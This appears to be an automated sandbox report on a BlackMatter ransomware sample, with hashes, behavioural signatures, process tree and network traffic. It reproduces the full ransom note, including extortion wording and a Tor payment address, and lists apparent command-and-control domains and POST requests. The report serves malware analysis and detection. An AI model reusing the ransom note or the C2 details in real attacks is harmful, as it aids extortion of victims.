Overview

overview

10

Static

static

sample.exe

windows7_x64

10

sample.exe

windows10_x64

10

Analysis

  • max time kernel
    137s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    01/08/2021, 19:34 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sample.exe

  • Size

    67KB

  • MD5

    598c53bfef81e489375f09792e487f1a

  • SHA1

    80a29bd2c349a8588edf42653ed739054f9a10f5

  • SHA256

    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6

  • SHA512

    6a82ad5009588d2fa343bef8d9d2a02e2e76eec14979487a929a96a6b6965e82265a69ef8dd29a01927e9713468de3aedd7b5ee5e79839a1a50649855a160c35

Score
10/10
ransomware

Malware Config

Extracted

Path

C:\oSPvdHTvI.README.txt

Ransom Note
~+ * + ' BLACK | () .-.,='``'=. - o - '=/_ \ | * | '=._ | \ `=./`, ' . '=.__.=' `=' * + Matter + O * ' . >>> What happens? Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver. We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data. >>> What guarantees? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. We always keep our promises. >> Data leak includes 1. Full emloyeers personal data 2. Network information 3. Schemes of buildings, active project information, architect details and contracts, 4. Finance info >>> How to contact with us? 1. Download and install TOR Browser (https://www.torproject.org/). 2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV. >>> Warning! Recovery recommendations. We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them.
URLs

http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV

Signatures

  • Modifies extensions of user files 19 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Modifies Control Panel 3 IoCs
    evasion
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sample.exe
    "C:\Users\Admin\AppData\Local\Temp\sample.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Control Panel
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1696
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3764
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2604
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\oSPvdHTvI.README.txt
      1⤵
      • Opens file in notepad (likely ransom note)
      PID:2704

    Network

    • flag-unknown
      DNS
      paymenthacks.com
      sample.exe
      Remote address:
      8.8.8.8:53
      Request
      paymenthacks.com
      IN A
      Response
      paymenthacks.com
      IN A
      206.188.197.206
    • flag-unknown
      DNS
      mojobiden.com
      sample.exe
      Remote address:
      8.8.8.8:53
      Request
      mojobiden.com
      IN A
      Response
      mojobiden.com
      IN A
      51.79.243.236
    • flag-unknown
      POST
      https://mojobiden.com/?Vqc=OMZzYTRcJ&l8uTU=33SN&EBLCajg=roMFpojHIg3K&jGGPtG=5Cgf4Y5LURVia76iJ&AlrG=bCRhsyDaQlBUTBm&zYh76=daQRh0zh&5sqNK=XoTFM6HgEhR8zlY&toytECZ=ixlaTpcYVc2bbQR9Iu&Q4dOAzP=1liI1Es3cIf101
      sample.exe
      Remote address:
      51.79.243.236:443
      Request
      POST /?Vqc=OMZzYTRcJ&l8uTU=33SN&EBLCajg=roMFpojHIg3K&jGGPtG=5Cgf4Y5LURVia76iJ&AlrG=bCRhsyDaQlBUTBm&zYh76=daQRh0zh&5sqNK=XoTFM6HgEhR8zlY&toytECZ=ixlaTpcYVc2bbQR9Iu&Q4dOAzP=1liI1Es3cIf101 HTTP/1.1
      Accept: */*
      Connection: keep-alive
      Accept-Encoding: gzip, deflate, br
      Content-Type: text/plain
      User-Agent: AppleWebKit/587.38 (KHTML, like Gecko)
      Host: mojobiden.com
      Content-Length: 634
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 01 Aug 2021 19:36:02 GMT
      Content-Type: application/json; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
    • flag-unknown
      DNS
      x1.c.lencr.org
      sample.exe
      Remote address:
      8.8.8.8:53
      Request
      x1.c.lencr.org
      IN A
      Response
      x1.c.lencr.org
      IN CNAME
      crl.root-x1.letsencrypt.org.edgekey.net
      crl.root-x1.letsencrypt.org.edgekey.net
      IN CNAME
      e8652.dscx.akamaiedge.net
      e8652.dscx.akamaiedge.net
      IN A
      104.73.61.97
    • flag-unknown
      GET
      http://x1.c.lencr.org/
      sample.exe
      Remote address:
      104.73.61.97:80
      Request
      GET / HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: x1.c.lencr.org
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Content-Type: application/pkix-crl
      Last-Modified: Mon, 26 Jul 2021 16:20:55 GMT
      ETag: "60fee0e7-2cd"
      Cache-Control: max-age=3600
      Expires: Sun, 01 Aug 2021 20:36:00 GMT
      Date: Sun, 01 Aug 2021 19:36:00 GMT
      Content-Length: 717
      Connection: keep-alive
    • flag-unknown
      POST
      https://mojobiden.com/?TDaznECZ=lFe5VY49wsXC&FCUZPGz54=rKy&g6v=UtDO&8Ab1mzraO=im1zadJOkXvCMVdoS&E6RXI=F3YJrQMbEoxxywX0KF
      sample.exe
      Remote address:
      51.79.243.236:443
      Request
      POST /?TDaznECZ=lFe5VY49wsXC&FCUZPGz54=rKy&g6v=UtDO&8Ab1mzraO=im1zadJOkXvCMVdoS&E6RXI=F3YJrQMbEoxxywX0KF HTTP/1.1
      Accept: */*
      Connection: keep-alive
      Accept-Encoding: gzip, deflate, br
      Content-Type: text/plain
      User-Agent: Edge/91.0.864.37
      Host: mojobiden.com
      Content-Length: 576
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 01 Aug 2021 19:36:47 GMT
      Content-Type: application/json; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
    • 206.188.197.206:443
      paymenthacks.com
      sample.exe
      156 B
       3
    • 206.188.197.206:80
      paymenthacks.com
      sample.exe
      156 B
       3
    • 51.79.243.236:443
      https://mojobiden.com/?Vqc=OMZzYTRcJ&l8uTU=33SN&EBLCajg=roMFpojHIg3K&jGGPtG=5Cgf4Y5LURVia76iJ&AlrG=bCRhsyDaQlBUTBm&zYh76=daQRh0zh&5sqNK=XoTFM6HgEhR8zlY&toytECZ=ixlaTpcYVc2bbQR9Iu&Q4dOAzP=1liI1Es3cIf101
      tls, http
      sample.exe
      2.0kB
       5.1kB
       13
      9

      HTTP Request

      POST https://mojobiden.com/?Vqc=OMZzYTRcJ&l8uTU=33SN&EBLCajg=roMFpojHIg3K&jGGPtG=5Cgf4Y5LURVia76iJ&AlrG=bCRhsyDaQlBUTBm&zYh76=daQRh0zh&5sqNK=XoTFM6HgEhR8zlY&toytECZ=ixlaTpcYVc2bbQR9Iu&Q4dOAzP=1liI1Es3cIf101

      HTTP Response

      200
    • 104.73.61.97:80
      http://x1.c.lencr.org/
      http
      sample.exe
      345 B
       1.1kB
       5
      3

      HTTP Request

      GET http://x1.c.lencr.org/

      HTTP Response

      200
    • 206.188.197.206:443
      paymenthacks.com
      sample.exe
      156 B
       3
    • 206.188.197.206:80
      paymenthacks.com
      sample.exe
      156 B
       3
    • 51.79.243.236:443
      https://mojobiden.com/?TDaznECZ=lFe5VY49wsXC&FCUZPGz54=rKy&g6v=UtDO&8Ab1mzraO=im1zadJOkXvCMVdoS&E6RXI=F3YJrQMbEoxxywX0KF
      tls, http
      sample.exe
      1.5kB
       648 B
       8
      5

      HTTP Request

      POST https://mojobiden.com/?TDaznECZ=lFe5VY49wsXC&FCUZPGz54=rKy&g6v=UtDO&8Ab1mzraO=im1zadJOkXvCMVdoS&E6RXI=F3YJrQMbEoxxywX0KF

      HTTP Response

      200
    • 8.8.8.8:53
      paymenthacks.com
      dns
      sample.exe
      62 B
       78 B
       1
      1

      DNS Request

      paymenthacks.com

      DNS Response

      206.188.197.206

    • 8.8.8.8:53
      mojobiden.com
      dns
      sample.exe
      59 B
       75 B
       1
      1

      DNS Request

      mojobiden.com

      DNS Response

      51.79.243.236

    • 8.8.8.8:53
      x1.c.lencr.org
      dns
      sample.exe
      60 B
       165 B
       1
      1

      DNS Request

      x1.c.lencr.org

      DNS Response

      104.73.61.97

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1696-114-0x0000000002993000-0x0000000002995000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1696-115-0x0000000002990000-0x0000000002991000-memory.dmp

      Filesize

      4KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.